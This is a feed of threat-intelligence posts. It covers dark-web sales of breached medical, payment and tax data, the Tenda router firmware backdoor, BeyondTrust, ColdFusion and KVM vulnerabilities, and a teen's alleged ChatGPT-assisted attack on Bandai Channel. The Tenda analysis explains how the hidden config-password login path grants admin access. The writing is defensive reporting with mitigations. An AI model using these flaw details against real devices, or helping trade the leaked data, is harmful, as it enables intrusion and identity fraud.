Sale, Over 2 Million Patient Records Exposed A threat actor using the alias **Saturne** is selling a database from **Follow.fr**, a French Ségur-certified medical software and patient-record platform used by specialist doctors and surgeons. The listing claims **2,052,123 patient records** in CSV format, dated July 2026, described as a partial export interrupted by detection. Per the schema, each record includes patient names, sex, date of birth, email and phone numbers, French **INSEE national identification numbers**, health insurance numbers, and associated doctor details. The price is negotiable and samples are offered to serious buyers. The claim is **unverified**. Severity CRITICAL Data2,052,123 records PriceNegotiable Country![France flag](https://flagcdn.com/w40/fr.png)France ActorSaturne ### ▣Post details TargetFollow.fr (medical / patient records) Country![France flag](https://flagcdn.com/w40/fr.png)France SectorHealthcare Claim2,052,123 patient records (CSV) DataNames, INSEE, insurance, doctors VectorMass export of patient lists ObservedJul 7, 2026 ActorSaturne ### !Allegedly included - 2,052,123 patient records - Patient names (birth & used) - Sex & dates of birth - Email & phone numbers - INSEE national ID numbers - Health insurance numbers - Profession & labels - Associated doctor details ### ◱Screenshot [ ![Follow.fr French medical platform data for sale forum post screenshot, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/97823597862359876235987623598729837.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/97823597862359876235987623598729837.png) ### ⚠Potential impact If genuine, this pairs patients' identities with French INSEE national identification numbers, health insurance numbers, and contact details across more than 2 million people, a combination that enables identity theft, insurance and healthcare fraud, and targeted phishing. Because the platform serves specialist doctors and surgeons, the records also link patients to their treating physicians, adding a sensitive medical dimension. INSEE numbers are core French identifiers and are not easily changed. No sample records, identifiers, download links, or the seller's contact channel are reproduced here. The claim is unverified. ### iStatus Unverified This is a sale listing; the price is negotiable and samples are offered to serious buyers. No sample records, identifiers, download links, or the Session contact channel are reproduced here. This is the same alias behind other recent French and European leaks. The claim is **unverified** and Follow has not publicly addressed it. Want everything on this breach, including the unblurred screenshots? **Paid subscribers** get the full claim details, breach URL, and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Payment Firm Nayax Allegedly Fully Breached, Actor Threatens 100TB Release With Over 1 Billion Card Records URL: https://darkwebinformer.com/payment-firm-nayax-allegedly-fully-breached-actor-threatens-100tb-release-with-over-1-billion-card-records/ Last updated: 2026-07-07T15:56:15.000Z Breach Report ![Israel flag](https://flagcdn.com/w40/il.png)Israel Fintech / Payments Pending Release ## Payment Firm Nayax Allegedly Fully Breached, Actor Threatens 100TB Release With Over 1 Billion Card Records A threat actor using the alias **TheSyndicate** claims to have fully compromised **Nayax**, an Israeli global payments and fintech company (NASDAQ: NYAX, TASE: NYAX.TA), stating they have been inside its systems for almost a year. The actor announces that over **100TB of exfiltrated data** will be released on **July 21st**, allegedly including **over 1 billion card-data records**, full KYC data, complete prepaid card data, customer identities, transaction histories, internal API keys and credentials, infrastructure maps, source code, and financial records. They say a portal to query the card data and download raw files will follow. The claim is **unverified** and the data has not yet been released. Severity CRITICAL Data100TB+ claimed Cards1 billion+ Country![Israel flag](https://flagcdn.com/w40/il.png)Israel ActorTheSyndicate ### ▣Post details TargetNayax (nayax.com) Country![Israel flag](https://flagcdn.com/w40/il.png)Israel SectorFintech / Payments ClaimFull compromise, 100TB+ exfiltrated Release dateJul 21, 2026 (announced) Access claimAlmost a year inside ObservedJul 7, 2026 ActorTheSyndicate ### !Allegedly included - 100TB+ exfiltrated (claimed) - Over 1 billion card records - Full KYC data - Prepaid card data - Customer identities - API keys & credentials - Source code & repositories - Infrastructure maps ### ◱Screenshot [ ![Nayax full breach announcement forum post screenshot, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/237985927836598273649875239678987235.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/237985927836598273649875239678987235.png) ### ⚠Potential impact If genuine, this would be one of the largest payment-related breaches on record. The combination of payment card data at billion-record scale, KYC identity data, and internal API keys and credentials would enable large-scale payment fraud, identity theft, and further attacks against Nayax's merchants and systems. The exposure of source code and infrastructure maps would compound the risk. The actor has announced a future release rather than posting data, so at this stage the scope is a claim. No data, samples, or the actor's release site are reproduced here. The claim is unverified. ### iStatus Unverified This is a pre-announcement: the actor claims a full compromise and says the data will be released on July 21st through a portal, with a Telegram update promised beforehand. No data has been posted yet, and neither the release site nor the contact channel is reproduced here. The claim is **unverified** and Nayax has not publicly addressed it. Want everything on this breach, including the unblurred screenshots? **Paid subscribers** get the full claim details, breach URL, and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Culiacán Municipal Health Portal Breached in Mexico, Minors' and Patients' Medical Records Leaked URL: https://darkwebinformer.com/culiacan-municipal-health-portal-breached-in-mexico-minors-and-patients-medical-records-leaked/ Last updated: 2026-07-07T15:30:19.000Z Breach Report ![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico Government / Health Involves Minors ## Culiacán Municipal Health Portal Breached in Mexico, Minors' and Patients' Medical Records Leaked A threat actor using the alias **derm0nix** (Hackero$ Crew) claims to have breached the **Portal de Salud de Culiacán**, the official digital health system of the Culiacán municipal government in Mexico, and has leaked the data for free. Per the post, it contains **4,045 complete patient records** (CSV and JSON) covering full identity including **CURP national ID numbers**, dates of birth, contact details and addresses, employment data, and detailed medical histories, including hereditary and pathological conditions, substance-use habits, and **gynecological and reproductive history**. The actor states the data **includes minors**. Because this involves minors' sensitive medical data, no samples, schema, or download link are reproduced here. The claim is **unverified**. Severity CRITICAL Data4,045 records TypeMedical records Country![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico Actorderm0nix ### ▣Post details TargetPortal de Salud de Culiacán (municipal gov) Country![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico SectorGovernment / Health Claim4,045 patient records (CSV + JSON) DataCURP, medical & reproductive history Period2018 to 2026 ObservedJul 2, 2026 Actorderm0nix (Hackero$ Crew) ### !Allegedly included - 4,045 patient records - Full names & CURP national IDs - Dates of birth & contact details - Home addresses - Employment / affiliation data - Full medical & pathological history - Gynecological & reproductive history - Includes minors' data ### ◱Screenshot [ ![Culiacan municipal health portal data breach forum post screenshot, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/78949276527865278653798623598723.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/78949276527865278653798623598723.png) ### ⚠Potential impact The dataset reportedly ties patients' names and CURP national ID numbers to home addresses, contact details, and highly sensitive clinical information, including mental-health, substance-use, and gynecological and reproductive history. Because the actor states minors are included, this is child-related medical data, and its exposure would create lasting risks of identity theft, discrimination, extortion, and targeting, with national ID numbers that cannot be reset. The screenshot is shown here in redacted form; no sample data or download link is reproduced. The claim is unverified. ### iStatus Unverified The actor posted a description, a data schema, and a download link, and promotes a contact channel for further leaks. No sample records, identifiers, the schema, the download link, or the contact channel are reproduced here. The claim is **unverified** and the Culiacán municipal government has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### When the Password Check Fails, You're In: The Hidden Admin Backdoor in Tenda Router Firmware (CVE-2026-11405) URL: https://darkwebinformer.com/when-the-password-check-fails-youre-in-the-hidden-admin-backdoor-in-tenda-router-firmware-cve-2026-11405/ Last updated: 2026-07-07T15:03:38.000Z Auth Backdoor CVSS Pending Impact Full Admin Access Patch None Available # When the Password Check Fails, You're In: The Hidden Admin Backdoor in Tenda Router Firmware (CVE-2026-11405) Tenda Router Firmware • CWE-912 Hidden Functionality • Published 2026-07-06 (CERT/CC) ## Vulnerability Overview [CVE-2026-11405](https://kb.cert.org/vuls/id/213560) is an undocumented authentication backdoor in multiple versions of **Tenda router firmware**. According to the CERT/CC advisory (VU#213560), an attacker can abuse a hidden alternate authentication path to bypass password verification and obtain full administrative control of a device's web management interface without valid credentials. Tenda is a widely used supplier of home and small-business networking gear, so a credential-free admin takeover in its firmware is a serious problem, made worse by the fact that there is no vendor patch at the time of writing. The bug was published on July 6, 2026, and researchers have not confirmed any active exploitation or public proof-of-concept code so far. Bottom Line There is no fix to install. If you operate an affected Tenda model, you must apply workarounds now: disable remote (WAN-side) web management, keep the admin interface off the public internet, and restrict it to a trusted, segmented network. CVE ID CVE-2026-11405 CVSS Score Pending Weakness CWE-912 / 288 Affected Product Tenda Firmware Affected Models FH1201 / W15E / AC10 / AC5 / AC6v2 Attack Surface Web Management Interface Patch Status No Vendor Patch Exploit Status None Known ## Why This Matters Consumer and small-business routers are among the most attacked devices on the internet. They are numerous, long-lived, rarely updated, and frequently exposed, which is precisely why router firmware is a favorite target for botnets that assemble compromised devices into infrastructure for DDoS, proxying, and further attacks. A hidden admin backdoor removes even the small friction of finding a bug to exploit: the alternate authentication path is baked into the firmware. Combined with the absence of a patch, that leaves affected owners dependent on configuration hardening rather than a clean fix, and it raises uncomfortable questions about how an undocumented credential path ended up in shipping firmware in the first place. ## Technical Analysis Per the CERT/CC analysis, the backdoor lives in the `login()` function of the device's `/bin/httpd` web server binary. The function starts down a normal authentication path that verifies the supplied password using MD5-based hashing. The problem is what happens on failure: instead of simply rejecting the login, the code activates an alternate path. It calls `GetValue("sys.rzadmin.password")` to pull a separate password value out of the device configuration, then performs a direct plaintext comparison between that configuration-stored value and the password the user submitted. If those two values match, the application grants administrator-level access (`role=2`) and establishes a valid session with elevated privileges. In other words, anyone who can reach the web interface and knows or can obtain the `sys.rzadmin.password` value gets in as admin, entirely outside the normal credential system. This is a hidden-functionality flaw (CWE-912), functionally an authentication bypass through an alternate channel (CWE-288), and it is exactly the kind of secondary, undocumented login path that should never exist in a security boundary. ## Affected Devices CERT/CC lists the following firmware builds as affected: | Model | Affected Firmware Build | | -------------- | ---------------------------------------------------- | | Tenda FH1201 | US\_FH1201V1.0BR\_V1.2.0.14(408)\_EN\_TD | | Tenda W15E | US\_W15EV1.0br\_V15.11.0.5(1068\_1567\_841)\_EN\_TDE | | Tenda AC10 | US\_AC10V1.0re\_V15.03.06.46\_multi\_TDE01 | | Tenda AC5 | US\_AC5V1.0RTL\_V15.03.06.48\_multi\_TDE01 | | Tenda AC6 V2.0 | US\_AC6V2.0RTL\_V15.03.06.51\_multi\_T | Because backdoor logic like this often shares a common code lineage across a vendor's product line, treat other Tenda models and firmware builds with appropriate suspicion even if they are not explicitly listed, and watch the CERT/CC note for updates. ## Exploitation & Patch Status As of publication, there is no confirmed in-the-wild exploitation and no public proof-of-concept, and this CVE is not listed in the CISA KEV catalog. That is the good news. The bad news is that Tenda has not released a patch, so the window between now and any future weaponization has to be covered entirely by hardening. Given how quickly router backdoors historically get folded into automated scanning and botnet tooling once details are public, affected owners should act now rather than wait for a fix that may be slow to arrive, if it arrives at all for older models. ## Mitigation & Workarounds With no patch available, the CERT/CC advisory and standard router-hardening practice point to configuration-based defenses: 1. **Disable remote web management.** Turn off WAN-side or internet-facing administration so the web interface cannot be reached from outside your network. This blocks the most dangerous, remote version of the attack. 2. **Change the default LAN IP address.** Moving off the default management address reduces trivial discovery by automated scanners and opportunistic tooling on the local network. 3. **Restrict and segment access.** Limit the management interface to a small set of trusted hosts, and isolate untrusted or guest devices from the network segment that can reach the router admin page. 4. **Monitor and plan replacement.** Watch for unexpected administrator sessions or configuration changes, and for older or end-of-life models that may never receive a fix, plan migration to a supported device. ## The Bigger Picture CVE-2026-11405 is a reminder that the trust you place in a device is only as good as the code you cannot see. An undocumented, config-driven admin login sitting quietly inside a shipping web server binary is the worst kind of vulnerability to defend against, because there is nothing to misconfigure on the user's side and, right now, nothing to patch. For defenders the practical takeaways are the durable ones for consumer and edge networking gear: never expose device administration to the internet, segment the networks these devices sit on, prefer vendors with a real track record of timely firmware fixes, and retire hardware that has aged out of support. Backdoors do not need an exploit; they just need to be reachable. ## References - [CERT/CC - VU#213560 (Tenda Firmware Hidden Authentication Backdoor)](https://kb.cert.org/vuls/id/213560) - [CVE.org - CVE-2026-11405 Record](https://www.cve.org/CVERecord?id=CVE-2026-11405) - [NVD - CVE-2026-11405](https://nvd.nist.gov/vuln/detail/CVE-2026-11405) - [The Hacker News - CERT/CC Warns of Hidden Admin Backdoor in Tenda Firmware](https://thehackernews.com/2026/07/certcc-warns-of-hidden-admin-backdoor.html) - [SecurityOnline - Tenda Authentication Backdoor (CVE-2026-11405)](https://securityonline.info/cve-2026-11405-tenda-authentication-backdoor/) ### Tokyo Police Arrest 15-Year-Old Over Alleged Bandai Channel Cyberattack URL: https://darkwebinformer.com/tokyo-police-arrest-15-year-old-over-alleged-bandai-channel-cyberattack/ Last updated: 2026-07-06T21:20:02.000Z Tokyo police have arrested a 15-year-old student over an alleged cyberattack targeting [Bandai Channel](https://www.straitstimes.com/asia/east-asia/japanese-teen-arrested-for-cyberattack-that-unsubscribed-over-46000-anime-accounts), a subscription-based anime and tokusatsu streaming service operated by Bandai Namco Filmworks. The student was arrested on July 4 and is accused of using a program created with ChatGPT assistance to disrupt the service in November 2025\. Police allege the program exploited a system vulnerability and sent false information to [Bandai Namco Filmworks servers](https://www.straitstimes.com/asia/east-asia/japanese-teen-arrested-for-cyberattack-that-unsubscribed-over-46000-anime-accounts). The alleged attack took place on November 4, 2025, between roughly 5:00 p.m. and 8:45 p.m., causing the unauthorized cancellation of [46,812 subscription accounts](https://www.straitstimes.com/asia/east-asia/japanese-teen-arrested-for-cyberattack-that-unsubscribed-over-46000-anime-accounts). Bandai Namco Filmworks’ operations were partially disrupted on November 6, and full service resumed in December after repairs were completed. Additional reporting says the student allegedly discovered the vulnerability by analyzing [Bandai Channel communication data](https://automaton-media.com/en/news/15-year-old-arrested-in-japan-over-alleged-cyberattacks-on-bandai-namco-anime-streaming-service-using-chatgpt-generated-malware/), then used ChatGPT to create the attack program. The company reportedly attempted to block the activity, but the suspect allegedly continued by [changing IP addresses around 30 times](https://automaton-media.com/en/news/15-year-old-arrested-in-japan-over-alleged-cyberattacks-on-bandai-namco-anime-streaming-service-using-chatgpt-generated-malware/). Police reportedly believe member information was obtained during the incident, including [email addresses and usernames](https://automaton-media.com/en/news/15-year-old-arrested-in-japan-over-alleged-cyberattacks-on-bandai-namco-anime-streaming-service-using-chatgpt-generated-malware/), though investigators had not found confirmed misuse of the information. The case is being framed around generative AI, but the security lesson is broader. The issue was not that AI magically bypassed defenses. The alleged incident shows how a vulnerable account-management workflow can be abused at scale once automation is introduced. For defenders, the takeaway is straightforward: state-changing account actions need strong authorization checks, rate limits, abuse monitoring, anomaly alerts, and recovery controls. Blocking an IP address is not enough when an attacker can rotate infrastructure and keep sending requests. ### Adobe ColdFusion flaw CVE-2026-48282 is now being Exploited in the Wild URL: https://darkwebinformer.com/adobe-coldfusion-flaw-cve-2026-48282-is-now-being-exploited-in-the-wild/ Last updated: 2026-07-06T20:30:32.000Z Adobe ColdFusion servers are once again being targeted after public details emerged for CVE-2026-48282, a maximum-severity path traversal vulnerability that can lead to remote code execution on vulnerable systems. The flaw affects ColdFusion 2025 Update 9 and earlier, as well as ColdFusion 2023 Update 20 and earlier. Adobe addressed the issue in ColdFusion 2025 Update 10 and ColdFusion 2023 Update 21. According to reported exploitation activity, attackers began probing for the vulnerability shortly after public details were released. Observed activity included unauthenticated attempts to read and write arbitrary files, raising the risk for exposed ColdFusion servers that have not yet been updated. The vulnerability carries a CVSS score of 10.0, making it a critical issue for organizations running internet-facing ColdFusion instances. Administrators should apply the latest Adobe ColdFusion updates immediately, review exposed instances, and check logs for suspicious file access, upload, or write activity. Source: ### Pre-Auth Access-Control Bypass in BeyondTrust Remote Support and PRA (CVE-2026-40138) URL: https://darkwebinformer.com/pre-auth-access-control-bypass-in-beyondtrust-remote-support-and-pra-cve-2026-40138/ Last updated: 2026-07-06T18:44:59.000Z Critical CVSS 4.0 9.2 Access Pre-Auth Exploit None Known # Pre-Auth Access-Control Bypass in BeyondTrust Remote Support and PRA (CVE-2026-40138) BeyondTrust RS & PRA • CWE-287 Improper Authentication • Published 2026-07-06 ## Vulnerability Overview [CVE-2026-40138](https://www.cve.org/CVERecord?id=CVE-2026-40138) is a critical pre-authentication vulnerability in the authentication subsystem of **BeyondTrust Remote Support (RS)** and **Privileged Remote Access (PRA)**. Per the vendor's CVE record, improper validation of authentication data may allow a network-positioned attacker to bypass access controls and gain unauthorized access to the appliance, including accounts with elevated privileges. It is scored **CVSS v4.0 9.2 (Critical)**. Two qualifiers materially shape the real-world risk and are worth stating up front: the CVSS vector indicates high attack complexity (`AC:H/AT:P`), and exploitation requires a specific authentication configuration to be enabled. Early Disclosure Note This CVE was published on July 6, 2026, and at the time of writing the deep technical details, the exact affected and fixed build numbers, and the corresponding BeyondTrust advisory identifier were not yet broadly available. Treat the specifics below as directional and confirm affected versions and patched builds against BeyondTrust's official security advisory before acting. CVE ID CVE-2026-40138 CVSS Score 9.2 - Critical Weakness CWE-287 Affected Product BeyondTrust RS / PRA Precondition Specific Auth Config Attack Vector Network / Pre-Auth Exploit Status None Known Fix Vendor Patch ## Why BeyondTrust RS and PRA Are High-Value Targets Remote Support and Privileged Remote Access sit at the center of privileged access for a large number of enterprises. BeyondTrust provides identity security services to more than 20,000 customers across over 100 countries, including a large share of the Fortune 100, which makes any pre-authentication flaw in these appliances a high-priority target for capable adversaries. The history reinforces the point: in 2024, the China-linked Silk Typhoon group exploited BeyondTrust RS zero-days ([CVE-2024-12356 and CVE-2024-12686](https://www.bleepingcomputer.com/news/security/beyondtrust-warns-of-pre-auth-rce-in-remote-support-software/)) in an intrusion later connected to the compromise of the U.S. Treasury, and in early 2026 a separate critical pre-auth RCE (CVE-2026-1731) came under active exploitation. A tool built to broker privileged access is, by design, a shortcut to everything it protects. ## Technical Analysis Based on the published description, CVE-2026-40138 is an authentication flaw rather than a memory-safety or injection bug: the authentication subsystem does not correctly validate authentication data, and that gap lets an attacker defeat access controls without valid credentials. The stated impact, unauthorized access to the appliance including elevated-privilege accounts, places this in the same dangerous class as an authentication bypass, where the attacker ends up authenticated as someone they are not. The CVSS vector adds important texture. `PR:N` and `UI:N` confirm the pre-auth, no-interaction nature, and the network attack vector (`AV:N`) means it is reachable remotely. At the same time, `AC:H` (high attack complexity) and `AT:P` (attack requirements present) signal that exploitation is not a trivial single request; it depends on conditions an attacker must meet or engineer. The vendor's explicit note that exploitation requires a specific authentication configuration to be enabled is the concrete expression of those requirements: environments that do not run that configuration are not in the exploitable path. Detailed mechanics were not public at the time of writing, which is consistent with responsible disclosure practice of withholding specifics while defenders patch. ## Am I Affected? Both Remote Support and Privileged Remote Access are named as affected, but the precondition matters: the risk concentrates on deployments that have the relevant authentication configuration enabled. Because exact affected and fixed build numbers were not yet widely published, the correct move is to open BeyondTrust's official advisory for CVE-2026-40138, confirm whether your version and configuration fall in scope, and identify the patched build for your product line. As a general rule for these appliances, SaaS instances are typically remediated server-side by BeyondTrust, while self-hosted customers must apply the patch themselves unless they are enrolled in automatic updates through the `/appliance` interface. ## Mitigation & Remediation Guidance for a critical pre-auth flaw in a privileged-access appliance, pending the specifics in BeyondTrust's advisory: 1. **Apply the vendor patch.** Confirm the fixed build in BeyondTrust's advisory and update. Self-hosted RS and PRA customers should patch manually if they are not subscribed to automatic updates, and older releases may need an interim upgrade before the fix can be applied, as with prior BeyondTrust advisories. 2. **Review the triggering authentication configuration.** Since exploitation depends on a specific auth configuration being enabled, verify whether that configuration is active in your environment. If it is not required, consider disabling it until patched, guided by the vendor advisory. 3. **Restrict network exposure.** Limit reachability of RS and PRA administrative and public interfaces to trusted networks. These appliances should not be broadly internet-exposed beyond what the service genuinely requires. 4. **Hunt and monitor.** Given BeyondTrust's history of exploited pre-auth bugs, review authentication logs for anomalous or unexpected privileged logins, watch for new or modified administrator accounts, and treat any sign of unauthorized access as a potential incident. ## The Bigger Picture CVE-2026-40138 continues a hard pattern for privileged remote access technology: the very systems organizations deploy to control and audit sensitive access keep surfacing critical pre-authentication flaws, and attackers keep prioritizing them because a single bypass can unlock an entire estate. The mitigating factors here, high attack complexity and a configuration-dependent precondition, mean this is not a spray-and-pray mass-exploitation scenario in the way a simple unauthenticated RCE would be. That is a reason to patch deliberately, not a reason to wait. Inventory your RS and PRA instances, confirm the affected configuration, apply the fix, and keep these appliances on a short patch leash, because the blast radius of the thing that guards privileged access is, by definition, large. ## References - [CVE.org - CVE-2026-40138 Record](https://www.cve.org/CVERecord?id=CVE-2026-40138) - [NVD - CVE-2026-40138](https://nvd.nist.gov/vuln/detail/CVE-2026-40138) - [BeyondTrust - Security Advisories (locate the CVE-2026-40138 advisory)](https://www.beyondtrust.com/trust-center/security-advisories) - [CSO Online - BeyondTrust Footprint and Prior Flaws (context)](https://www.csoonline.com/article/4130415/beyondtrust-fixes-critical-rce-flaw-in-remote-access-tools.html) - [BleepingComputer - History of BeyondTrust RS/PRA Exploitation (context)](https://www.bleepingcomputer.com/news/security/beyondtrust-warns-of-pre-auth-rce-in-remote-support-software/) ### A Long-Lived KVM Bug Resurfaces: Shadow Paging Use-After-Free in the Linux Kernel (CVE-2026-53359) URL: https://darkwebinformer.com/a-long-lived-kvm-bug-resurfaces-shadow-paging-use-after-free-in-the-linux-kernel-cve-2026-53359/ Last updated: 2026-07-06T17:31:23.000Z Kernel UAF CVSS Pending Impact Host Memory Corruption Exploit None Known # A Long-Lived KVM Bug Resurfaces: Shadow Paging Use-After-Free in the Linux Kernel (CVE-2026-53359) Linux Kernel / KVM x86 • CWE-416 Use-After-Free • Published 2026-07-04 ## Vulnerability Overview [CVE-2026-53359](https://nvd.nist.gov/vuln/detail/CVE-2026-53359) is a use-after-free in the Linux kernel's **KVM x86 shadow paging** code. It is the second half of a bug that was only partially closed by an earlier fix: a mismatch in the KVM MMU's bookkeeping lets the kernel free a page-table tracking structure while references to it remain live, opening the door to memory corruption in the host kernel. Per [LWN](https://lwn.net/Articles/1081230/), the flawed code path has existed since the 2.6.36 kernel (2010), so it has been dormant across roughly a decade and a half of releases. It carries no CVSS score at the time of writing, and there is no known exploitation. It was resolved in the July 2026 round of stable kernel updates. CVE ID CVE-2026-53359 CVSS Score Pending Weakness CWE-416 Component KVM x86 (Shadow MMU) Introduced Kernel 2.6.36 Attack Surface Local / Virtualization Exploit Status None Known Fixed In July 2026 stable Bottom Line This is a host-side memory-safety bug in KVM's shadow MMU, not a remote or web-facing flaw. If you run KVM hosts, apply your distribution's July 2026 kernel update. Systems using hardware-assisted paging (EPT/NPT) exercise the shadow MMU far less, but the correct response is still to patch. ## Background: Shadow Paging and the KVM MMU When KVM cannot lean on hardware-assisted nested paging (Intel EPT or AMD NPT), it falls back to **shadow paging**: the hypervisor maintains its own shadow page tables that translate guest-physical to host-physical addresses, mirroring the guest's own page tables. KVM tracks each shadow page with a `struct kvm_mmu_page`, and each shadow page-table entry (SPTE) is reverse-mapped so the kernel can find and tear down mappings later. Two attributes on that structure matter here: the guest frame number (`GFN`) it represents, and its **role**, which includes a `direct` flag distinguishing a directly-mapped large page from a shadowed page-table level. Correct cleanup depends on these fields accurately identifying the structure that owns a given entry. ## Technical Analysis An earlier fix, commit `0cb2af2ea66ad` ("KVM: x86: Fix shadow paging use-after-free due to unexpected GFN"), addressed one version of this problem. That bug could be triggered by modifying a page-directory entry (`PDE`) mapping from outside the guest and then deleting a memslot: the `rmap_remove()` cleanup would miss entries created after the PDE change, because the `GFN` of the leaf SPTE no longer matched the `GFN` recorded on the owning `kvm_mmu_page`. Entries that should have been removed were left behind, referencing a structure that could then be freed. CVE-2026-53359 is the hole that fix did not cover. When the modified PDE points to a *non-leaf* page rather than a leaf, the `GFN` can be made to match, so the earlier GFN-based check passes. The **role**, however, does not match: the original large 2MB mapping created a `kvm_mmu_page` with `direct=1`, while the new 4KB mapping requires one with `direct=0`. Because identity was being validated on the GFN alone, the mismatched role slips through, cleanup again fails to account for the right entries, and the kernel can free a `kvm_mmu_page` that is still referenced. The result is a classic use-after-free: subsequent access to the dangling structure operates on freed memory, which is the foundation for host kernel memory corruption and, in the worst case, privilege escalation on the host. The fix tightens the check so that both GFN and role must agree before entries are treated as belonging to the same shadow page. ## Who Is Actually Exposed? Context matters for prioritization here. The bug lives specifically in the **shadow paging** path, which modern deployments exercise much less often because current Intel and AMD processors provide hardware nested paging (EPT/NPT) that KVM uses by default. Shadow paging still comes into play in scenarios such as older hardware, certain nested-virtualization configurations, or setups where hardware paging is unavailable or disabled. Triggering the flaw also requires a fairly specific sequence involving a PDE modification and memslot deletion, operations tied to how the virtual machine and its memory are managed, so this is not a trivial one-shot from an unprivileged guest in every configuration. None of that makes it safe to ignore: use-after-free bugs in the host kernel MMU are exactly the class of issue that skilled attackers turn into guest-to-host escapes or local privilege escalation given the right conditions. ## Affected & Fixed Versions | Kernel | Status | Notes | | -------------------------------------------------------- | ---------- | ------------------------------------------- | | 2.6.36 through pre-fix releases | Vulnerable | Flawed shadow-paging cleanup path present | | 7.1.3, 6.18.38, 6.12.95, 6.6.144, 6.1.177 (and mainline) | Fixed | July 2026 stable updates add the role check | Distributions ship their own kernel builds and backports, so the exact fixed package version depends on your vendor. Track the fix through your distribution rather than the upstream number alone. ## Remediation Guidance for a kernel memory-safety fix like this is straightforward: 1. **Update the kernel.** Apply your distribution's patched kernel from the July 2026 stable series (or a later release that includes the fix), then reboot into it. This is the complete remediation. 2. **Prefer hardware nested paging.** Where practical, ensure hosts use EPT/NPT rather than shadow paging, which minimizes exposure to this code path. Treat this as defense in depth, not a substitute for patching. 3. **Restrict who can run untrusted guests.** On multi-tenant KVM hosts, limit the ability to launch untrusted or attacker-influenced VMs until the patched kernel is deployed, since guest-to-host memory-safety bugs are most dangerous in shared environments. 4. **Track the fix per distribution.** Confirm remediation against your vendor's security tracker, because backported fixes will not match upstream version numbers. ## The Bigger Picture CVE-2026-53359 is a tidy illustration of two recurring themes in kernel security. First, incomplete fixes: the original patch correctly closed the GFN mismatch but left a structurally identical hole reachable through a slightly different path, a reminder that a fix guarding one field (GFN) is not enough when identity actually depends on several (GFN and role). Second, longevity: a defect can sit quietly in a complex, security-critical subsystem like the KVM MMU for well over a decade before the exact triggering conditions are analyzed and reported. The practical takeaway is unglamorous and reliable: keep hosts on current stable kernels, prefer hardware features that shrink the attack surface, and treat the hypervisor's memory-management code as the high-value target it is. ## References - [CVE.org - CVE-2026-53359 Record](https://www.cve.org/CVERecord?id=CVE-2026-53359) - [NVD - CVE-2026-53359](https://nvd.nist.gov/vuln/detail/CVE-2026-53359) - [LWN - Seven Stable Kernels (July 2026)](https://lwn.net/Articles/1081230/) - [Debian Security Tracker - CVE-2026-53359](https://security-tracker.debian.org/tracker/CVE-2026-53359) - [SUSE - CVE-2026-53359](https://www.suse.com/security/cve/CVE-2026-53359.html) ### Malaysia's LHDN Tax Portal Data Offered for Sale, 10 Million Taxpayer Records Exposed URL: https://darkwebinformer.com/malaysias-lhdn-tax-portal-data-offered-for-sale-10-million-taxpayer-records-exposed/ Last updated: 2026-07-03T15:07:56.000Z Breach Report ![Malaysia flag](https://flagcdn.com/w40/my.png)Malaysia Government / Tax Data for Sale ## Malaysia's LHDN Tax Portal Data Offered for Sale, 10 Million Taxpayer Records Exposed A threat actor using the alias **dezetat** is advertising a database from Malaysia's **Inland Revenue Board (LHDN / IRBM)**, taken from the MyTax portal, for **$20,000**. The listing claims **10 million taxpayer records** in JSON format, exfiltrated in June 2026\. Per the post and schema, each record includes the taxpayer's **NRIC national ID number**, name, tax number (TIN), date of birth, marital status, full address, email, and phone, along with employer details and, for millions of records, **bank account numbers** and bank names. The seller states roughly 5.29 million records include a bank account number. The claim is **unverified**. Severity CRITICAL Data10M records Price$20,000 Country![Malaysia flag](https://flagcdn.com/w40/my.png)Malaysia Actordezetat ### ▣Post details TargetInland Revenue Board (LHDN / IRBM), MyTax Country![Malaysia flag](https://flagcdn.com/w40/my.png)Malaysia SectorGovernment / Tax Claim10M taxpayer records (JSON) DataNRIC, TIN, bank accounts, addresses Exfil dateJune 2026 ObservedJul 2, 2026 Actordezetat ### !Allegedly included - 10M taxpayer records - NRIC national ID numbers - Tax numbers (TIN) - Names & dates of birth - Full addresses - Email & phone numbers - Bank accounts (\~5.29M) & names - Employer & company data ### ◱Screenshot(s) [ ![Malaysia LHDN IRBM MyTax data for sale forum post screenshot, July 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/235789235769829837698723598711352.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/235789235769829837698723598711352.png) [ ![Malaysia LHDN IRBM MyTax data schema and sample screenshot, July 2026 (2 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/235789235769829837698723598711353.png) Screenshot 2 Redacted preview 